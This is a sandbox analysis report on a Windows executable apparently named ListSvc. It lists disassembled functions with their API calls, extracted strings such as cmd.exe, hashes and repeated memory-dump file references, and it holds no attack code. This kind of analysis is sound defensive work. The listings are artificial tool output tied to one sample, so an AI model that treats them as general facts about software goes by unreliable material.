Instruction ID: 8490eda7aae5474be0b02337b94e319d82e09844d8c50d4b14fc66eb57101d9e
Opcode Fuzzy Hash: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
Instruction Fuzzy Hash: 32E09232744700AEE711ABA5DC62F3A77E9E74DB10B62447AF404E2690D634AD009A28

Uniqueness

Uniqueness Score: -1.00%

Function 006AC4CA, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510

Strings

Common Files, xrefs: 006AC393
ProgramFilesDir, xrefs: 006AC322, 006AC3A9
Failed to get path of 64-bit Program Files directory, xrefs: 006AC3CB
cmd.exe, xrefs: 006AC53B
\Program Files, xrefs: 006AC349
CommonFilesDir, xrefs: 006AC35C, 006AC3D8
SystemDrive, xrefs: 006AC2C1
Failed to get path of 64-bit Common Files directory, xrefs: 006AC3FA
COMMAND.COM, xrefs: 006AC55C

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: FolderFreeKnownPathTask
String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
API String ID: 969438705-544719455
Opcode ID: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
Instruction ID: c6c261769d38d943bb646f4c75fbe89f1fed75b0b48c3df2323ffd2a5fb60eac
Opcode Fuzzy Hash: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
Instruction Fuzzy Hash: 7DE02230B00300AEEB12AFA8CC02F2A73A9EB09B40F62447AF400D6680D634ED108E38

Uniqueness

Uniqueness Score: -1.00%

Function 004786AC, Relevance: 3.0, APIs: 2, Instructions: 16COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(00000000,000000FC), ref: 004786B3
DestroyWindow.USER32(00000000,00000000,000000FC,?,?,0061559E,006B8C29), ref: 004786BB

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Window$DestroyLong
String ID:
API String ID: 2871862000-0
Opcode ID: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
Instruction ID: 631b19700b559cadd17185a070b253bcc10ed0a910bd4b2a6cdfdfbedeaeb0c2
Opcode Fuzzy Hash: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
Instruction Fuzzy Hash: 14C012A12021302A161131796CC98EB00888C823A9329866FF824862D3DF8C0D8102ED

Uniqueness

Uniqueness Score: -1.00%

Function 00406DF0, Relevance: 2.6, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(006CFADC,00000000,00008000), ref: 00406E0E
VirtualFree.KERNEL32(006D1B80,00000000,00008000), ref: 00406E8A

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
Instruction ID: 8d3276661228be03e62c92a97986ee0a4f38eb12010ad15582d000b3628175ea
Opcode Fuzzy Hash: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
Instruction Fuzzy Hash: CA1194716007009FD7648F58D841B26BBE2EB84754F26807FE54EEF381D678AC018BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00409B58, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,00409BA6,?,006C5000,006D1B9C,?,?,00409FA9,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409B96

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
Instruction ID: 984d59f3d031b3db7ed4f0d205521ad444ca36c97295ef9fd1821bff389e3508
Opcode Fuzzy Hash: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
Instruction Fuzzy Hash: 3BF09031B05705AED3314F0AB880E53BBACFB4A770755047BD808A6792E3B9BC00C5A4

Uniqueness

Uniqueness Score: -1.00%

Function 004236FC, Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,?,?,00443D4C,00469961,00000000,00469A4C,?,?,00443D4C), ref: 00423745

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
Instruction ID: 502252b8251e75369e7d593655d0488969bd90bcda5cf89e16fadd6ec266699d
Opcode Fuzzy Hash: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
Instruction Fuzzy Hash: AEE0DFE3B401243AF72069AE9C82F7B9159C781776F06023AFB60EB2D1C558EC0086E8

Uniqueness

Uniqueness Score: -1.00%

Function 005C857C, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CBEAE,00000000,005CBEFF,?,005CC0E0), ref: 005C859B

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
Instruction ID: 09862238c43e822cbcf5df792bab944b0a9534785c307f7411e32f5bd31f51a0
Opcode Fuzzy Hash: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
Instruction Fuzzy Hash: 30E020707543113EF32421950C43FFA1589F7C0B04FE4443D76409D2D5DEF9D8554296

Uniqueness

Uniqueness Score: -1.00%

Function 005C6808, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,00000000,005C684E,?,00000000,00000000,?,005C689E,00000000,0060C275,00000000,0060C296,?,00000000,00000000,00000000), ref: 005C6831

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b20873582e115f6403f0b7dec274c5602bc03a2b9c5d8d66d1ec80c96a2dfcd3
Instruction ID: 7ef4f7d410bb1350c6c34c2cfd3ab79e32246cebd9daa6780dadc2d4ee8c12dd
Opcode Fuzzy Hash: b20873582e115f6403f0b7dec274c5602bc03a2b9c5d8d66d1ec80c96a2dfcd3
Instruction Fuzzy Hash: 9AE09231344308AFE701EAF6CC52E5DB7EDE749704B924879F400D7682E678AE108458

Uniqueness

Uniqueness Score: -1.00%

Function 0040D754, Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 0040D772

Part of subcall function 0040E9E0: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
Part of subcall function 0040E9E0: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: FileModuleName$LibraryLoad
String ID:
API String ID: 4113206344-0
Opcode ID: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
Instruction ID: e6e9750417710ce6057aade1326652b07051d0f0da16d230474427610a1a2044
Opcode Fuzzy Hash: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
Instruction Fuzzy Hash: 6EE0C9B1A013109BCB10DE98C8C5A577794AF08754F044AA6ED64DF386D375D9248BD5

Uniqueness

Uniqueness Score: -1.00%

Function 005118B8, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00027365,00000000,00000000,004C0068,006083EC,?,00000000,?,00000001,00000000,00000000,00000000,?,0068D5D0,00000001), ref: 005118CB

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1ef83a670f5add13b9a374239f5fba316326babbb4ed16e1d195e7c525f61efe
Instruction ID: 9fcb5f38b0df23c263da8a60913ea9fccafb23266d8756c351c2c96681b23a4d
Opcode Fuzzy Hash: 1ef83a670f5add13b9a374239f5fba316326babbb4ed16e1d195e7c525f61efe
Instruction Fuzzy Hash: 70E09A712056405BEB84DE5CC4C5B957BE9AF49214F1440E5ED498B25BC7749C48CB54

Uniqueness

Uniqueness Score: -1.00%

Function 005C68A4, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,?,0060C4A9,00000000,0060C4C2,?,?,00000000), ref: 005C68AF

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2c2e483fa7f1336923ebad64303dd8ba648d4ecb4c9f1657c83a641d7b42aed9
Instruction ID: d55d13c6b4de8628cf529bab2b0a17402205638270c5277f1e7dff5d9331f337
Opcode Fuzzy Hash: 2c2e483fa7f1336923ebad64303dd8ba648d4ecb4c9f1657c83a641d7b42aed9
Instruction Fuzzy Hash: 75D012A034520019DE1455FE19F9F5907C45F85325B140B6EB965D51E2D3298F9B1059

Uniqueness

Uniqueness Score: -1.00%

Function 005C685C, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,00000000,005CD6D7,00000000), ref: 005C6867

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 339870d1e71ad855811f7abdfcd0412af3d786cf88be23b77bd5956e1918a324
Instruction ID: 78aee2f50b20cc69f9a983c300c852fe0a8819bfcc82724499c751dbdfa7c08b
Opcode Fuzzy Hash: 339870d1e71ad855811f7abdfcd0412af3d786cf88be23b77bd5956e1918a324
Instruction Fuzzy Hash: 86C08CA02412000A6E1065FE1CC9E5902E85E0533A3240B6EF438E22E3D629CAA3201A

Uniqueness

Uniqueness Score: -1.00%

Function 00424020, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNEL32(00000000,?,006B8A06,00000000,006B8C15,?,?,00000005,00000000,006B8C4E,?,?,00000000), ref: 0042402B

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: df8aed0e477c8dea0ce41bbd81e691bd114315e892edfb9c442192a2e0a47cf9
Instruction ID: daf6799c843f8394e9bb8cef5a1a486137c4a768e82a56cfe4f83ef7845b6ded
Opcode Fuzzy Hash: df8aed0e477c8dea0ce41bbd81e691bd114315e892edfb9c442192a2e0a47cf9
Instruction Fuzzy Hash: 9AB012A27903400ACE0075FF0CC9D1D00CCD95920F7200FBFB409D2143D57EC484001C

Uniqueness

Uniqueness Score: -1.00%

Function 0042B8A3, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,0042B8C1), ref: 0042B8B4

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
Instruction ID: 1e160e63f6e1d4a3e736ac7d2d169814141797cfe1ada65cb98a64290c0f9c9c
Opcode Fuzzy Hash: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
Instruction Fuzzy Hash: 9CB09B76F0C2005DA709B695745146C67D8EBC47103E148A7F404C2540D57C5444451C

Uniqueness

Uniqueness Score: -1.00%

Function 006ACE20, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
Instruction ID: 0a261b708251fa214c00368c1c1d02b101a55c617d2dc256ba4673a2d64f6cb6
Opcode Fuzzy Hash: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
Instruction Fuzzy Hash: 0DC002B0D131009ECF40DF7CDE45B4237E6A704305F081427F905C61A4D6344440EB24

Uniqueness

Uniqueness Score: -1.00%

Function 0047845C, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,006D62F8,00000000,00000000,?,00478693,00000000,00000B06,00000000,?,00000000,00000000,00000000), ref: 0047847A

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fc669b537235a23ae2906f34a93fdf65b951992da1392276f95ab17c119d37c1
Instruction ID: 21ed9f25b44590dd6a88678dd2699128a8c8abd14296acda62ee9fdc78064473
